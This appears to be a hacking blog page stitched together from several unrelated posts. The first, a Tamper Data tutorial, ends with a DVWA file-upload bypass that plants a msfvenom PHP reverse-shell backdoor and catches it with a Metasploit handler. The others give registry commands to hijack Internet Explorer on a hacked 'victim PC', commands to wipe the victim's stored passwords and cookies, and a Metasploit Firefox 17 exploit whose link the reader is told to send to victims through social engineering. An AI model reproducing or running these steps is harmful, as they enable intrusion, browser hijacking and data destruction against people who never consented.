Web Penetration Testing with Tamper Data (Firefox Add-on)

Tampering is the way of modifying the request parameters before request submission. Tampering can be achieved by various methods and one of the ways is the through Tamper Data. Tamper data is one of the highly used extensions in Firefox. It allows tampering the data that is sent between client and the server as well as an easy access to GET and POSTING element’s data.

Installing Tamper Data Add-On

 Select the menu bar on the right end in Firefox. Click on Add-ons.

In the search bar field, search for Tamper Data add-on. Click on Install after installing the add-on, restart the Firefox Browser.

Displaying clear text password in Facebook using Tamper Data

 Now I am trying to login into my Facebook account and when I typed my password I see the “password in dotted form” so I wanted to know whether the password typed is correct or not. Click on tools option from menu bar and select tamper data to capture the request.

A pop will get open for tamper data click on start tamper which start capturing the ongoing request as we know that the username and password typed in the fields go through POST method. Now After that click on Login button to send the data through POST method.

When the request will send through browser to web server a pop up will appear, now hit Tamper, which will start capturing the sending request.

Now you can see from given image on the right half of Tamper Popup window it is showing the email and pass in clear text.

HTML Injection – Reflection POST method with Tamper Data

 I have installed bWAPP on my wamp server running on localhost. It can be accessed through browser. Navigate to login page using url “localhost/bWAPP/login.php”.

 Login into web application server by typing bee: bug as login credential, now choose your bug” html injection-reflected (post)” from given list of bugs and click on hack.

In given text field enter first name: kunal and last name: bhal.

Before clicking Go; again start tamper data to change the field values. After that we can see the post values and now modify it to change the username of any person.

Now click on go and a dialog box get opened here click on tamper to capture the request.

Here you can read the captured request from given screenshot which has captured the first and last name kunal: bhal.

Tamper data allow you to modify the sent request of any user without his permission, so I am going to change first and last name given by user into first as first name and last as last name and then click on ok to forword the request.

Now you can see the request has been forward on the web server.

We successfully changed the username of the person; here you can see username to be “first last”. Similarly you can use other modules with tamper data to exploit bWAPP.

File upload using tamper data

Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and login with following credentials:

Username – admin

Password – password

Click on DVWA Security and set Website Security Level medium then select file upload vulnerability

Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f raw

Copy and paste the highlighted code in leafpad and save as with PHP extension as hacked.php.png on the desktop.

Load metasploit framework type msfconsole and start multi handler.

Now click to browse button to browse hacked.php.png file to upload.

Click on tools option from menu bar and select tamper data to capture the request.

Before clicking upload; again start tamper data and then click on upload; when the request will send through browser to web server a pop up will appear then, now hit Tamper, which will intercept the sending request.

From given screenshot you can see tamper data has capture the POST request now copy the selected data from POST DATA.

Paste POST DATA in a text file to change the extension of our upload. As you can read the name of file is hack.php.png but we want to upload a php file.

Now modify pasted POST DATA hacked.php.png into hacked.php then select and copy the complete data.

Now past the whole data of text file in the field given for POST DATA and click on ok

So here we have forward the modified request, now click on stop tamper.

From screenshot you can see our php is uploaded in uploads directory. Now copy the highlighted path /hackable/uploads/hacked.php where file is uploaded and run this path

http://192.168.1.102:81/DVWA/hackable/uploads/hacked.php in URL to execute it.

You will get victim reverse connection on metasploit.

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.103

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

meterpreter > sysinfo

 I have got meterpreter session of victim PC

Author: Kunal Bahl is a skilled computer enthusiastic and an Ethical Hacker. He has a great interest in gadgets and currently pursuing Bachelor’s in Electronics and Communication Engineering Contact Here

Hack Internet Explorer in Remote PC set your desired Home page

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Set Your Desired Website as Home Page

Type the following commands in the command prompt. (Enter the web address of the desired website; here we have taken an example of (http://www.hackingarticles.in/)

REG ADD “HKCU\Software\Microsoft\Internet Explorer\Main” /V “Start Page” /D “http://www.hackingarticles.in/” /F

Now, open the internet explorer in the remote victim PC, we would see that the chosen webpage will open as the homepage.

Stylish Home Page

(Use this link www.shinysearch.com  to put your own desired text.)

REG ADD “HKCU\Software\Microsoft\Internet Explorer\Main” /V “Start Page” /D “http://www.shinysearch.com/myhome.php?theme=matrix&ltext=www.hackingarticles.in” /F

Check out this screenshot seen after opening the internet explorer.

Insert Your Image in Google Background

Type the following command)

(Take the reference of the link   http://www.hackingarticles.in/insert-image-google-search/   to put your own desired image in the background)

REG ADD “HKCU\Software\Microsoft\Internet Explorer\Main” /V “Start Page” /D “http://www.shinysearch.com/myhome.php?style=mypic_full&img=b26b7e0e353d82b7642905e68ca5476e&ltext=Your%20Name” /F

Open the internet explorer; we would get the image in the Google search background.

How to Delete Passwords/Cookies/History/Temp Internet File of Internet Explorer in Remote Victim PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Delete Temporary Internet Files

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8

Delete Cookies

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2

Delete History

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1

Delete From Data

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16

Delete Passwords

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32

Delete All

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255

Delete All + files and settings stored by Add-ons

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351

Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the <body> (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Exploit Targets

Firefox 17.0.1

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/multi/browser/firefox_svg_plugin

msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)

msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)

msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)

msf exploit (firefox_svg_plugin)>exploit

Now an URL you should give to your victim http://192.168.1.167:8080/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Related Posts Plugin for WordPress, Blogger...